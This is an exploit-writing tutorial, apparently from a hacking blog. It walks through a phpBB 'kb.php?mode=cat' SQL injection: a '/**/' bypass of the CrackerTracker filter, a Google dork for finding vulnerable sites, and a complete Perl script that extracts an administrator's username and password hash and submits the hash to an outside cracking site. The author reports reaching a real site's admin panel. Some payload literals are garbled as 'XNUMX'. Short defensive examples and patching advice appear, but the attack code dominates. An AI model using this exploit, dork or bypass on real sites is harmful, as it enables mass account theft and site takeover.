How do hackers create their exploits?

Surely most of us have seen hacker movies. Films in which the protagonist-hacker, sitting in his chair surrounded by three or four monitors, passionately types incomprehensible things on the keyboard and tries to get at secrets. Having written many lines of code (or something that looks like code) and <...>

after pressing Enter and Backspace, he manages to break into the system that has been "fighting" him so hard. As usual .. on-screen ...

Some believe that a real hacker would never use a ready-made program to break into a remote computer. This, of course, as we have said many times in the past, is not absolute. A hacker could write an automated routine that speeds up (so to speak) his searching and spares him unnecessary effort. Of course, using a ready-made program has become taboo, since the critical "do it manually" majority considers it script-kiddie behaviour. And this delicate point is one that ALL of us should understand.

There are no standard practices, techniques or logic used by so-called hackers. Everything is perfectly acceptable as long as the primary purpose of the search and research is clearly knowledge! In this article we will try to outline some techniques that a hacker would use to gain access to a remote system (always with Administrator rights) that he has had his eye on for a long time. Do not forget that this system could be your own ... the one you admire, believing that it passes its nights undisturbed by intruders.

Let's talk about exploits.

An exploit, for those who do not know, is a piece of executable code (usually small), or a sequence of commands, that takes advantage of a software bug (a malfunction or vulnerability in existing software) to force the software into abnormal behaviour, such as displaying the username and password of a database user.

Exploits are usually classified according to the following criteria:

  • The type of vulnerability they exploit
  • The place where they run, that is, whether the exploit runs on the same computer as the application (local) or against a remote machine (remote). When an exploit is applied locally, it results in elevating the rights of the person running it. When an exploit runs remotely, it exploits the remote system's vulnerability without requiring any prior access to that system.
  • The result the attacker obtains by running the exploit (e.g. EoP, DoS, spoofing, SQL injection)

We will study the stages of "exploiting" a bug with an exploit, from the moment the bug is found up to the moment the executable code is created and run.

The process:

  • Find a security hole. If this security hole has not been published on the Internet, it is designated a 0day (zero day). Usually 0days are released on the Internet before a patch has been created to close the hole they exploit. The name comes from the fact that security staff are not even aware that the vulnerability exists until the exploit is released.
  • Discover a Dork, so as to find many vulnerable pages that have exactly the same security hole and are exploited in the same way!
  • Write the exploit, which will automatically exploit the discovered bug and deliver the results of the attack in a very short time.

From theory to practice.
First, we will see how a hacker would create an exploit based on a previously known BUG.
As our example we will use the bug found in "/kb.php?mode=cat&cat='". This particular security gap lies in the fact that the PHP script does not filter the data we give it, so it displays various elements of the database that a visitor should clearly never see. But let's take things in turn.

Find and use the BUG.
If we request something like "http://www.site.gr/kb.php?mode=cat&cat='" and the server we are addressing indeed has the bug we are referring to, it will answer us:

Could not get category data

DEBUG MODE

SQL Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3

SELECT * FROM phpbb_kb_categories WHERE class_id = '

Line: 134
File: functions_kb.php

Image 1
The first signs of a problematic version of phpBB are obvious. But how far they will let us into the system is, for the moment, a puzzle!

We know from the already published bug that the table holding the usernames and passwords for this version of phpBB is called phpbb_users and that its columns are username and user_password. Naturally, not knowing them would not bother us much: we would just have to dump the database and find which table holds the usernames and passwords.

ATTENTION: A typical SQL injection attack on the site could look like this:

http://www.site.gr/kb.php?mode=cat&cat=-99999 union select 0,1,2,3,4,5 from phpbb_users where user_id=2

but the result, unfortunately for us, would not be as pleasant, because the CBACK CrackerTracker v4 application answers:

- SECURITY ALERT -

The Board Security System has detected that you wanted to bring bad
Code to this Forum or you have tried to exploit something here or maybe
another attack like this.

This attempt was blocked and we logged all the information about this.

If you see this message after including a new MOD to your Forum or if
you have reached this site over a normal Forum Link, please contact
the Board Administrator to fix this Problem.

Image 2
Oh no! We were caught!

The CBACK CrackerTracker v4 application has shown that it is active and has "bitten", so we have to look for another way into the system's database. Perhaps we should look for a backdoor.

If you have the impression that our site administrator has backed us against the wall, then you probably have not heard of the "/**/" trick, which is used primarily in SQL injection attacks. This is probably the system's backdoor. Those who do not know exactly what the CBACK CrackerTracker application "is" and "does" can visit its page. The site showed us the security alert on:

http://www.site.gr/kb.php?mode=cat&cat=-99999 union select 0,1,2,3,4,5 from phpbb_users where user_id=2

We replace every space with "/**/", so that after this process the URL becomes:

http://www.site.gr/kb.php?mode=cat&cat=-99999/**/union/**/select/**/0,1,2,3,4,5/**/from/**/phpbb_users/**/where/**/user_id=2

And yes .. the security system did not spot us. You see, CBACK CrackerTracker does not manage to "understand" "/**/" as dangerous, while it identifies the spaces as violent attacks.
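Why the trick works is easy to demonstrate with a filter that only expects spaces between keywords. The following is an added example in Python, not the original article's code and not CBACK CrackerTracker's actual rules (which the page does not show): a whitespace-only pattern beside a version that percent-decodes and strips inline comments before matching, run over the two URLs quoted above plus a benign request (all constructed sample input).

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample requests: the two injection URLs quoted on this page and one benign request.
SAMPLE_URLS = [
    "http://www.site.gr/kb.php?mode=cat&cat=-99999 union select 0,1,2,3,4,5 from phpbb_users where user_id=2",
    "http://www.site.gr/kb.php?mode=cat&cat=-99999/**/union/**/select/**/0,1,2,3,4,5/**/from/**/phpbb_users/**/where/**/user_id=2",
    "http://www.site.gr/kb.php?mode=cat&cat=7",
]

# A rule that only expects whitespace between the keywords (the behaviour the article exploits).
KEYWORDS = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)


def normalize(value: str) -> str:
    """Undo the encodings that hide keywords: percent-decode, drop /* */ comments, collapse spaces."""
    value = unquote(value)                                     # %2F%2A%2A%2F -> /**/
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.DOTALL)  # each inline comment becomes a space
    return re.sub(r"\s+", " ", value).strip()                  # tabs, newlines, runs of spaces -> one space


def query_values(url: str):
    """Yield every query-string value of the request, regardless of parameter name."""
    for values in parse_qs(urlsplit(url).query, keep_blank_values=True).values():
        yield from values


def naive_flags(url: str) -> bool:
    """Match the raw value only: "/**/union/**/select" slips through, as on the page."""
    return any(KEYWORDS.search(v) for v in query_values(url))


def hardened_flags(url: str) -> bool:
    """Match after normalisation, so comment-spacing and URL-encoding no longer help."""
    return any(KEYWORDS.search(normalize(v)) for v in query_values(url))


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"naive={naive_flags(url)!s:5} hardened={hardened_flags(url)!s:5} {url[:70]}")
```

Normalising input before matching closes this particular gap; it does not turn a keyword filter into a substitute for fixing the query itself.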

If you are wondering how we found the number of columns the URL needs, the answer lies in front of your eyes. You can work either manually or automatically; in both cases the process is the same. As long as the page's response is:

SQL Error: 1222 The used SELECT statements have a different number of columns

we add another column .. until we find the final number of columns.

Now we will try to pull out the "username" and "user_password" data.

http://www.site.gr/kb.php?mode=cat&cat=-99999/**/union/**/select/**/0,1,2,3,concat(username,0x3a,user_password),5/**/from/**/phpbb_users/**/where/**/user_id=2

Image 3
Eventually we managed to bypass CBACK CrackerTracker v4.

So, with joy and ease, the server with its SQL injection detection system showed us the username and password hash of the user with user_id = 2.
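To show the root cause rather than the filter, here is an added example in Python (not from the article or from phpBB) that rebuilds the page's `WHERE class_id = ...` query on an in-memory SQLite database: the interpolated form that produces the page's syntax error and leaks a user row, beside the parameterised form. Table contents are constructed, and SQLite's `||` stands in for MySQL's concat(username,0x3a,user_password) in the payload.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-ins for the two phpBB tables named on the page; the categories
    table has six columns, matching the six-column UNION the article arrives at."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_kb_categories (class_id INTEGER, cat_id INTEGER, cat_name TEXT,
                                          c4 INTEGER, c5 INTEGER, c6 INTEGER);
        CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT);
        INSERT INTO phpbb_kb_categories VALUES (1, 1, 'General', 0, 0, 0);
        INSERT INTO phpbb_users VALUES (2, 'admin', 'constructed_md5_placeholder');
    """)
    return db


# The article's payload; SQLite's || replaces MySQL's concat(username,0x3a,user_password).
PAYLOAD = ("-99999/**/union/**/select/**/0,1,2,3,username||':'||user_password,5"
           "/**/from/**/phpbb_users/**/where/**/user_id=2")


def lookup_vulnerable(db: sqlite3.Connection, cat: str) -> list:
    """Interpolates the cat parameter into the statement, as the kb.php query on the page does."""
    sql = f"SELECT * FROM phpbb_kb_categories WHERE class_id = {cat}"
    return db.execute(sql).fetchall()


def lookup_parameterised(db: sqlite3.Connection, cat: str) -> list:
    """Binds the value instead; whatever it contains is compared as data, never parsed as SQL."""
    return db.execute("SELECT * FROM phpbb_kb_categories WHERE class_id = ?", (cat,)).fetchall()


def probe(db: sqlite3.Connection, lookup) -> str:
    """The article's first test, a lone quote. Returns 'syntax error' or 'no error'."""
    try:
        lookup(db, "'")
        return "no error"
    except sqlite3.OperationalError:
        return "syntax error"


if __name__ == "__main__":
    db = build_db()
    print("probe vulnerable:", probe(db, lookup_vulnerable))          # syntax error, like MySQL 1064
    print("probe parameterised:", probe(db, lookup_parameterised))    # no error
    print("union vulnerable:", lookup_vulnerable(db, PAYLOAD))        # leaks admin:<hash>
    print("union parameterised:", lookup_parameterised(db, PAYLOAD))  # []
```

Updating phpBB, as the locking section below advises, removes the known hole; binding parameters removes the class of bug.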

Discovering the exploit's Dork.
To find the Dork that corresponds to this particular security gap, it must contain the basic features of the vulnerable script's URL. So we have Google search each site's URL for "kb.php?mode=cat". The complete Dork in Google's language is "inurl:kb.php?mode=cat".

Creating our exploit.
Code that takes advantage of "kb.php?mode=cat&cat=" is the following (the numeric literals in the long string on line 15, and in the copy of it further below, were lost when the page was extracted and appear as XNUMX):

```perl
01  #!/usr/bin/perl
02  use strict;
03  use HTTP::Request::Common;
04  use LWP::UserAgent;
05  use IO::Socket;
06
07  print "\n\n[*] Exploit [kb.php?mode=cat]\n";
08  print "[*] Written by mr.pr0n\n";
09  print "[*] Dork: allinurl:kb.php?mode=cat\n";
10
11  print "\nEnter Host: ";
12  chop(my $kb = <STDIN>);        # e.g. http://www.site.gr, no trailing slash
13  print "User Id Number [>=2]: ";
14  chop(my $usid = <STDIN>);
15  my $xploit = "/kb.php?mode=cat&cat=-XNUMX/**/union/**/select/**/XNUMX,database(),XNUMX,concat(XNUMXxXNUMXfXNUMXcXNUMXbXNUMXxXNUMXa,username,XNUMXxXNUMXa,user_password,XNUMXxXNUMXa,XNUMXxXNUMXfXNUMXcXNUMXbXNUMX),XNUMX/**/from/**/phpbb_users/**/where/**/user_id=";
16
17  ####### Xploiting #########
18  print "[+] Exploiting...\n";
19  my $lwp = LWP::UserAgent->new() or die;
20  my $check = $lwp->get($kb . $xploit . $usid);
21  if ($check->content =~ m/totalxaker:(.*):(.*):totalxaker/g)
22  {
23          my ($username) = $1;
24          my ($hash) = $2;
25          print "[+] Yeah, its Vulnerable!!\n";
26          print "-> Username: $username\n";
27          print "[MD5 Password: $hash]\n";
28
29          ####### Cracking #########
30          my $url = "http://hash.insidepro.com";   # lookup site named in the text; the exact form URL is not given on the page
31          print "[+] The MD5 password...";
32          my $lwp = LWP::UserAgent->new();
33          my $request = $lwp->post($url, ["H1" => $hash, "Onclick" => "Search"]);
34          my $insidepro = $request->content();
35          if ($insidepro =~ m/<\/script>$hash:<font color="Blue">(.*)<\/font><br><br>/g)
36          {
37                  print "CRACKED!!!\n";
38                  print "---> Password: $1\n";
39          }
40          else
41          {
42                  print "not found!\n";
43          }
44  }
45  else
46  {
47          print "[-] Exploit failed!\n";
48          print "---> Maybe NOT vulnerable!\n";
49  }
50  print "-------------------------------\n";
```

Lines 1-6
In the very first line we define the interpreter, which is none other than /usr/bin/perl (on *nix systems). In the following lines we declare the modules our program will use when it runs: HTTP::Request::Common for the requests made over the HTTP protocol, and LWP::UserAgent, which simulates a browser so that the program's requests look as if they came from a regular browser.

Lines 7-10
Here are a few introductory elements about the program and its author, as well as a reference to the Dork the user can use to identify pages that are vulnerable to this bug and therefore exploitable by the program we created and present to you.

Lines 11-16
The program then "asks" the user to enter a site in the form http://www.site.gr, which is then stored as $kb. Then the user is asked once again (and for the last time!) to enter data: the user_id of the account to check. The user_id is stored as $usid and "kept" in the program's memory for later. In $xploit the entire exploit line is stored:

/kb.php?mode=cat&cat=-XNUMX/**/union/**/select/**/XNUMX,database(),XNUMX,concat(XNUMXxXNUMXfXNUMXcXNUMXbXNUMXxXNUMXa,username,XNUMXxXNUMXa,user_password,XNUMXxXNUMXa,XNUMXxXNUMXfXNUMXcXNUMXbXNUMX),XNUMX/**/from/**/phpbb_users/**/where/**/user_id=

which we used earlier to display the username and the password (as a hash) of the user with user_id 2.

Lines 17-21
The attack has just begun. We have created the conditions to emulate a real browser connection through the program, assembling the complete exploit in the variable $check = $lwp->get($kb . $xploit . $usid). That is, the items entered by the user are joined with the exploit in $check, in the form $kb . $xploit . $usid: the site name is the variable $kb and the user_id is the variable $usid. Then, on line 21, the response is checked for the data enclosed by the keywords we set.

Lines 22-28
If all goes well and the site is actually vulnerable to this particular bug, then two "new" variables, $username and $hash, receive the items found by the search on line 21. The following lines then print that data to the screen.

Lines 29-44
Because, "unfortunately" for us, the password that is displayed is in hash form, we should build a hash cracker into our program. We will look up the hash we found at http://hash.insidepro.com. We have to simulate, through the program, the moves we would make on that site. To do this we need to find the exact names of the site's buttons and text fields, so that we can fill them in correctly (and as it should be done). When this is done (and if done properly) our program makes the site search its database for the given hash, and the result of the "break" appears in the variable $1.

Lines 45-50
If the hash cannot be found in the hash.insidepro.com database, the program simply prints "not found!". If it cannot retrieve the username/hash at all, it prints [-] Exploit failed! on the screen.

Run the exploit
If everything runs smoothly, then during the exploit's execution you will logically get the following result.


Image 4
Our exploit works perfectly.

We have now obtained the username and password of the user with user_id = 2 and cracked the password hash; let's see whether that account is actually in effect, and whether we ultimately got the prize or wasted our time, your time and lots of grey matter!

Image 5
NO. Your eyes are not deceiving you. What you see is indeed an Administrator Panel, and we/you are Administrators. Do not forget the basic rule of hackers: I DO NOT TAMPER WITH anything I do not own!!!

And yes .. we took a walk through the site's administrator panel. A site which, do not forget, also had protection against SQL injection attacks. Ultimately, nothing is unhackable, eh?

Locking the back door.

A better and safer solution for avoiding unpleasant intrusions into your system is to update your existing version of phpBB, which will, for the time being, keep out the adventurous intruders who would so much like to break into your system and damage your files!! Of course, an update should not make you complacent, because it is not a measure that stops attacks; it just gives your system more chances to remain unscathed. It would be good to search the Internet for exploits for your version and to perform controlled attacks on your own site, so that you know the potential security loopholes you have and can close them ... before the attackers find them and plant a shell on the site.

Writing the epilogue
Every lock has a key. Every security system has a small, forgotten back door through which intruders may well be able to slip in and turn themselves into the System Administrator. The administrators of the site on which our experiments were conducted clearly did not know about this security gap, so we hope they find and secure it now. At this point we would like to assure those responsible for the site that we never tampered with any file or data of the site that hosted our experiments. But nobody should forget that all the tools and penetration methods presented in the magazine's articles should in no way be used for destruction or showing off, but for creation and knowledge! Every destructive or fanatical act (in any field), apart from the fact that it characterises petty and immature people (regardless of age), finds us firmly opposed!

Source: http://ghostinthelab.wordpress.com
